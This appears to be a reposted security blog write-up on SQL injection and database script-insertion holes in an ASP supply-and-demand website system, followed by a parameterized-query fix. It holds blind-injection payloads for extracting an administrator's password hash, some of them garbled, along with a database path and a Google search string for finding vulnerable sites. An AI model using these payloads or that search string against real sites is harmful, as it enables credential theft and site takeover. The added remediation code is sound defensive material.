From alimail Blog http://www.virusest.com/
Daily Supply and Demand Information Website Management System 4.2 has SQL injection and database insertion vulnerabilities
1. getpwd2.asp
<%
Response.Buffer = True
Dim rs, sql, user, username
Dim problem, id
username = Request.Form("username")
problem = Request.Form("problem")
Dim connuser, password
sql = "select * from [ttdv_user] where username=" & username & ""
Set rs = Server.CreateObject("ADODB.Recordset")
rs.Open sql, conn, 1, 1
Session("gpw_error") = Session("gpw_error") + 1
If rs.EOF Then Response.Write "The information you submitted is incorrect and the password cannot be retrieved!"
%>
We can see that the username from the form is concatenated straight into the query as the filter condition; the technique is the same as in the online shopping mall system.
Or (select count (*) from ttdv_admin where id = 55 and asc (mid (password, 1, 1) between 48 and 57) <> 0 and = // determine whether the first character of the password is a digit (48-57 is 0-9); if so, narrow the range step by step to determine the password's MD5 value
Or (select count (*) from ttdv_admin where id = 55 and asc (mid (password, 122) between 97 and) <> 0 and = // determine whether the first character of the password is a letter; if so, proceed as above
Submit the injection statement. If the condition is true, the page proceeds to the next step; otherwise an error message is returned.
However, this is slow in practice: guessing the 32-character MD5 hash one character at a time takes half a day. Look at the second hole:
2. If the database has not been hardened, a one-line script can be inserted into it. There is no need to encode it here; just submit it directly in the message body, because the anti-injection code only checks Request.QueryString.
Database address: data\%23data%23.asp. But the database connection was slow during the test; I had to wait a while before the database was displayed.
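The fix a maintainer would apply to the getpwd2.asp lookup above is to stop concatenating the username and pass it as a bound parameter, which also removes the dependence on the Request.QueryString-only filter mentioned under the second hole. This is an added example, not the vendor's code; it assumes the existing connection object conn, the ttdv_user table from the page, and a maximum username length of 50 (a placeholder to match the column).

```vbscript
<%
' Parameterized replacement for the vulnerable lookup in getpwd2.asp.
' Assumes an open ADODB connection named conn (as in the original page).
Option Explicit
Dim username, cmd, rs

' Request.Form is untrusted input just like Request.QueryString; the
' product's filter only inspects the latter, so rather than extending
' the filter, the value is never placed into SQL text at all.
username = Request.Form("username")

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = 1 ' adCmdText
cmd.CommandText = "SELECT * FROM [ttdv_user] WHERE username = ?"
' adVarWChar = 202, adParamInput = 1; 50 is an assumed column width.
cmd.Parameters.Append cmd.CreateParameter("username", 202, 1, 50, username)

' The driver sends the value separately from the statement, so quotes
' or subqueries in the username are matched literally, never executed.
Set rs = cmd.Execute

Session("gpw_error") = Session("gpw_error") + 1
If rs.EOF Then
    Response.Write "The information you submitted is incorrect and the password cannot be retrieved!"
End If

rs.Close
Set rs = Nothing
Set cmd = Nothing
%>
```

The same ADODB.Command pattern applies to every other page of the system that builds SQL from Request.Form or Request.QueryString; the Access file should additionally be moved outside the web root so it cannot be requested as data\%23data%23.asp.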
Google: inurl:onews.asp?catid